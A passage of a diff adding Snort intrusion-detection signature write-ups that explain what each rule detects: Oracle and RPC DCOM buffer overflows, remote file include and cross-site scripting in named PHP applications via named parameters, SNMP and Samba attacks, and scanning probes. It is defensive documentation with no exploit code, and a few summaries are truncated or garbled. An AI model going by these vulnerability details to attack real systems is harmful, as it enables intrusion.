+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+Arachnids:
+http://www.whitehats.com/info/IDS184
+
+--
--- /dev/null
+++ b/doc/signatures/3096.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3096
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000927.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This rule detects certain phishing attempts sent via Microsoft Messenger.
+
+--
+Impact:
+Users who are fooled by the phising attempt may be tricked into downloading 
+malicious code.
+
+--
+Detailed Information:
+The Microsoft Messenger service, which is enabled by default on many Windows 
+systems, allows remote users to send pop-up messages to a given system. While 
+legitimate uses exist, many of these pop-ups contain adware, spyware, and/or 
+phishing attempts. This rule detects a common phishing attempt, which "warns" 
+users that their registry is corrupted and directs them to download software to 
+fix the "problem" at a malicious web site.
+
+--
+Affected Systems:
+Any Windows system with Microsoft Messenger enabled and reachable from the 
+Internet.
+
+--
+Attack Scenarios:
+Attackers will typically use publicly available scripts to send malicious 
+messages.
+
+--
+Ease of Attack:
+Simple; public scripts exist for sending malicious messages.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block Microsoft Messenger at your firewall and/or disable it on individual 
+machines, and educate your users regarding the dangers of following links in 
+such messages.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Sago Networks
+Dan Protich <dprotich@sagonet.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2767.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2767
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_delete_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000647.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000647
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "user_search.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "user_search.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000462.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000462
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Open WebMail" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "From" parameter in the "openwebmail-read.pl" 
+script used by the "Open WebMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Open WebMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2879.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2879
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure cancel_statistics
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3184.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3184
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2457.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+2457
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger sends or receives a Yahoo Instant Messenger message. 
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+Yahoo IM provides a means of allowing an interactive message exchange between user.  While there are no known exploits associated with exchanging messages, this type of activity may not be appropriate in certain network environments.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No known attacks.
+
+--
+Ease of Attack:
+No known attacks.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
--- /dev/null
+++ b/doc/signatures/3185.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3185
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1120.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1120
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1409.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1409
+
+--
+Summary:
+This event is generated when an attempt is made to attack a device using SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service (DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community string 
+buffer overflow, that will allow an attacker to execute arbitrary code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of SNMP v1 protocol
+	
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 161 
+of a vulnerable device, causing a Denial of Service or possible execution of 
+arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the SNMP v1 protocol, use SNMP v2 protocol as an alternative.
+
+Disable the use of SNMP for devices that do not need it.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-03.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000426.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000426
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DotClear" application running on a webserver. Access to the file "prepend.php" using a remote file being passed as the "blog_dc_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "blog_dc_path" parameter in the "prepend.php" script used by the "DotClear" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DotClear
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2049.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2049
+
+--
+Summary:
+a MS-SQL database.
+
+--
+Impact:
+Disclosure of an instance of MS-SQL running on a host.
+
+--
+Detailed Information:
+nessus is being used to query for the existance of a MS-SQL database 
+running on a host. This may be the prelude to an attack against the 
+service.
+
+--
+Affected Systems:
+All systems running MS-SQL.
+
+--
+Attack Scenarios:
+This is a probe, the attacker merely needs to use nessus to search the 
+target for services.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Use a firewall to deny connections to port 1434.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10674
+
+--
--- /dev/null
+++ b/doc/signatures/378.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+378
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running Ping-O-Meter software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Ping-O-Meter software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS164
+
+--
--- /dev/null
+++ b/doc/signatures/2290.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2290
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1503.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1503
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2021.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2021
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+dismounted via UDP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2465.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2465
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000782.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000782
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Horde" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "url" parameter in the "go.php" script used by the "Horde" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Horde
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Dan Raswami <dan.raswami@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000548.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000548
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Blue Dragon CMS" application running on a 
+webserver. Access to the file "forum_admin.php" using a remote file being 
+passed as the "DragonRootPath" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DragonRootPath" parameter in the "forum_admin.php" 
+script used by the "PHP Blue Dragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Blue Dragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000841.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000841
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PerForms" application running on a webserver. Access to the file "performs.php" using a remote file being passed as the "mosConfig_absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mosConfig_absolute_path" parameter in the "performs.php" script used by the "PerForms" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PerForms
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/553.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+553
+
+--
+Summary: 
+The event is generated when an attempt is made to log on to an FTP server with the username of "anonymous".
+
+--
+Impact: 
